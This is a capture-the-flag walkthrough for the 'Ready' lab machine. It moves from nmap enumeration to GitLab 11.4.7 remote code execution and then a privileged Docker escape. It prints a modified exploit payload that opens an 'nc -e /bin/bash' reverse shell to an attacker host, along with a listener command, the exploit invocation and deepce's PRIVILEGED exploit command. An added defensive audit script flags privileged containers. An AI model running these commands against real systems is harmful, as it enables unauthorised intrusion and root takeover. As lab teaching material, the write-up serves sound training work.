Ready


Port Scanning and General Enumeration (Nmap)

nmap -sV -sC -oN nmap/initial -T4 10.10.10.220


22 and... 5080?


Gitlab!


Access (searchsploit, gitlab)

Let’s see what version of Gitlab we’re working with:

  1. top right, drop down menu
  2. help


Gitlab version 11.4.7

Checking searchsploit for public exploits for Gitlab 11.4.7:

I used the first one but it requires a bit of editing. Here’s what I added:

open(\\'|""" + f'nc -e /bin/bash YOURIP YOURPORT' + """ \\').read\\"]

The original wouldn’t work; this one should. (Replace YOURIP and YOURPORT with your listening IP and port, respectively.)

Start a listener:

nc -lvnp 4444

And run the script!

python3 exploit.py -u YOURUSERNAME -p YOURPASSWORD -g http://10.10.10.220 -l YOURIP -P YOURPORT

Quick tip!

You may want to stabilize your shell at this point. A quick and dirty way to do so is:

python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm

Privesc Part 1 (password-reuse, linpeas)

Linpeas kicks back a lot of juicy information, but this box has some curveballs and 90% of it is irrelevant for the completion of this box. This is definitely a case of K.I.S.S.

K.I.S.S.: keep it simple, stupid

Main two things we’re after here:

Keep that in mind for later.

First thing you should always do when you find a plaintext password? Use it! Use it everywhere!

Turns out..


Let’s capture the root fla—


Well, let’s try and escape the docker then!


Privesc Part 2: ESCAPE-trick boogaloo (deepce, docker escape)

First things first when trying to do anything: enumeration. We’ll be using deepce. It’s very similar to Linpeas. It’s amazing.

The interesting finding:

Running a container as privileged gives us the ability to execute commands as root.
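As an added defensive counterpart (not part of this writeup or of deepce), here is a small audit that reads `docker inspect` output and flags the configuration deepce reported above, so an operator can catch it before someone else does. The JSON below is constructed sample data in the shape of `docker inspect`, trimmed to the fields the check reads; it was not captured from the box.

```python
import json

# Constructed sample in the shape of `docker inspect <container>` output,
# trimmed to the fields this audit reads. Not taken from the target.
SAMPLE_INSPECT = json.dumps([
    {"Name": "/gitlab",
     "HostConfig": {"Privileged": True, "CapAdd": None,
                    "Binds": ["/srv/gitlab:/var/opt/gitlab"]}},
    {"Name": "/ci-runner",
     "HostConfig": {"Privileged": False, "CapAdd": ["SYS_ADMIN"],
                    "Binds": ["/var/run/docker.sock:/var/run/docker.sock"]}},
    {"Name": "/db",
     "HostConfig": {"Privileged": False, "CapAdd": None, "Binds": []}},
])


def audit_containers(inspect_json: str) -> dict[str, list[str]]:
    """Return {container_name: [findings]} for containers whose HostConfig
    effectively hands the container root account control of the host.

    Only containers with at least one finding appear in the result.
    """
    findings: dict[str, list[str]] = {}
    for container in json.loads(inspect_json):
        host_cfg = container.get("HostConfig", {})
        issues = []
        # --privileged: all capabilities, all host devices, no seccomp/AppArmor.
        # This is exactly what deepce flagged as PRIVILEGED above.
        if host_cfg.get("Privileged"):
            issues.append("privileged container (container root is host root)")
        # CAP_SYS_ADMIN alone is enough to mount host filesystems from inside.
        if "SYS_ADMIN" in (host_cfg.get("CapAdd") or []):
            issues.append("CAP_SYS_ADMIN added")
        # A mounted Docker socket lets the container start new privileged
        # containers on the host, which is equivalent to --privileged.
        for bind in host_cfg.get("Binds") or []:
            if bind.split(":")[0] == "/var/run/docker.sock":
                issues.append("docker socket bind-mounted")
        if issues:
            findings[container["Name"].lstrip("/")] = issues
    return findings


if __name__ == "__main__":
    for name, issues in audit_containers(SAMPLE_INSPECT).items():
        print(f"{name}: {'; '.join(issues)}")
```

On a real host, feed it `docker inspect $(docker ps -q)`; any hit should be removed in favour of the specific capabilities or mounts the workload actually needs.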

The other cool feature of deepce is that it has an exploit mode:

./deepce.sh --no-enumeration --exploit PRIVILEGED --username deepce --password deepce

You can read about the available exploits by following the link above in Reading/Resources.

All that’s left to do is ssh in as the new root user!
